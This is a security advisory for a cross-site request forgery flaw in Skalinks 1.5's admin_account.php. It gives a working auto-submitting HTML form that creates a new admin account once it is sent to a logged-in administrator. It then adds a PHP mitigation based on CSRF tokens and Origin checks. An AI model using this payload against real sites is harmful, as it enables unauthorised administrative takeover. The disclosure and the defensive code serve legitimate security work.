Skalinks <= 1_5 Cross Site Request Forgery Add Admin

2007.11.10
Credit: djvincy
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hacking Inside

Site: www.hackinginside.altervista.org
Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin
Author: Vincy
Email: djvincy (at) hotmail (dot) it [email concealed]

This code must be saved in an HTML page and sent to the site admin. The admin will then add a new admin to the MySQL database with that information. It works only if the admin is logged in.

------------------------------------------------------------------------

<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
  <input type="text" name="admin_name" value="[ NOME ]">
  <input type="text" name="admin_password" value="[ PASSWORD ]">
  <input type="text" name="admin_email" value="[ EMAIL ]">
  <select name="admin_type"><option value="2">Super Editor</option></select>
  <input type="hidden" name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>

------------------------------------------------------------------------

# Vincy - Hacking Inside Crew
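The root cause is that admin_account.php accepts the Add_admin POST from any origin as long as the admin's session cookie rides along. As an added mitigation example (not the advisory's code and not Skalinks' own), the handler below applies the synchronizer-token pattern: the path and the Add_admin field come from the advisory, while the csrf_token field, the function names and the session layout are assumptions.

```php
<?php
// Added example, not Skalinks code: CSRF protection for a handler like
// admin/admin_account.php. The genuine admin page carries a per-session secret
// that a cross-site auto-submitting form cannot read, so the forged POST fails.
session_start();

// Issue one unpredictable token per session (32 random bytes, hex-encoded).
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

function csrf_token_valid(array $post, array $session): bool {
    // Both tokens must be present; compare in constant time (hash_equals)
    // so the check does not leak partial matches through timing.
    if (empty($session['csrf_token']) || empty($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

function origin_allowed(array $server, string $expected_host): bool {
    // Defence in depth: browsers add Origin (or Referer) to cross-site POSTs.
    // If the header is present it must name our own host; if absent we fall
    // back to the token check alone rather than breaking older clients.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return true;
    }
    return parse_url($source, PHP_URL_HOST) === $expected_host;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['Add_admin'])) {
    if (!csrf_token_valid($_POST, $_SESSION)
        || !origin_allowed($_SERVER, $_SERVER['HTTP_HOST'])) {
        // Log the rejected attempt: repeated hits here are a detection signal.
        error_log('admin_account.php: rejected Add_admin POST without valid CSRF token from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        http_response_code(403);
        exit('Request rejected.');
    }
    // Only a token-bearing request from the real admin page reaches the
    // original account-creation logic (insert into the admin table) here.
}
?>
<!-- The legitimate form embeds the token; the attacker's page cannot obtain it. -->
<form action="admin_account.php" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) ?>">
  <input type="text" name="admin_name">
  <input type="hidden" name="Add_admin" value="Add Admin">
</form>
```

Setting the session cookie with the SameSite attribute adds a browser-side layer, but the server-side token remains the control that closes the CWE-352 issue described above.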


Copyright 2024, cxsecurity.com
